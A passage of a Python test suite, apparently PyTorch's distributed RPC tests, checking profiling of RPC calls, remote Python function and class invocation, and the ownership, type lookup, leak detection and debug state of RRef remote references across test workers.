def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
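# Collects the top-level (non-nested) events from each thread's process-global profile
# and compares their names against the expected list.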
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits the
# context manager before the remote function has run.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
nested_rpc,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(rref.to_here(), torch.ones(n, n) * 2)
@dist_init
def test_builtin_remote_self(self):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(torch.ones(2, 2), torch.ones(2, 2)),
)
self.assertEqual(rref.local_value(), torch.ones(2, 2) * 2)
def _test_multi_remote_call(self, fn, args_fn=lambda x: (), kwargs_fn=lambda x: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n),
kwargs=kwargs_fn(n),
)
)
expected.append(fn(*args_fn(n), **kwargs_fn(n)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@dist_init
def test_multi_builtin_remote_ret(self):
def args_fn(n):
return (torch.ones(n, n), torch.ones(n, n))
self._test_multi_remote_call(torch.add, args_fn=args_fn)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@dist_init
def test_multi_py_udf_remote(self):
def kwargs_fn(n):
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
self._test_multi_remote_call(my_function, kwargs_fn=kwargs_fn)
@dist_init
def test_py_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rref_args_user_share(self):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rpc_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, torch.ones(n, n) + 4)
@dist_init
def test_nested_remote(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
nested_remote,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 3)
@dist_init
def test_nested_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
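# A minimal sketch of the helper assumed above (nested_rref is defined elsewhere in
# this file; the body below is illustrative only): B runs nested_rref and creates
# two OwnerRRefs on C, e.g.
#
#     def nested_rref(dst):
#         return (
#             rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
#             rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
#         )
#
# so to_here() on rref_of_rrefs fetches B's two UserRRefs, and each inner
# to_here() then pulls the tensors owned by C.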
@dist_init
def test_nested_rref_stress(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to hit timeout
# errors or connection-closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error is raised if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
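# Sketch of an alternative (not exercised by the test above): the same remote method
# calls can usually be written with the RRef proxy helpers, e.g.
#
#     rref.rpc_sync().increment_value(10)
#     value = rref.rpc_sync().get_value()
#
# The explicit _call_method_on_rref helper is kept here because it routes the bound
# method through rpc.rpc_sync directly.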
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# The remote call raises, so _get_type() should surface the error.
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
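# Why len(x) == 2 above: a and b are owned by this worker, so a.owner() and b.owner()
# hash to the same WorkerInfo key and the second insertion overwrites the first;
# likewise other_a and other_b share the remote owner's WorkerInfo key.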
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote object
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
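# Rough sketch of the call path being intercepted (for clarity, not verbatim):
#
#     rpc.shutdown() -> rpc.api.shutdown()
#         -> _delete_all_user_and_unforked_owner_rrefs()  # attribute looked up on rpc.api
#
# Because the lookup happens on the `torch.distributed.rpc.api` module object, only
# patching that attribute (as done below) actually intercepts the call.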
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on the remote end.
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we need a barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally; the barrier after ensures that no following state
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# An RRef on a local value is not added to the context until it is shared over RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
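# The barrier/check/barrier pattern used above, in sketch form (the calls are the
# ones used in this test; only the ordering is summarized):
#
#     dist.barrier()                          # all prior cross-worker state settled
#     info = _rref_context_get_debug_info()   # inspect local state
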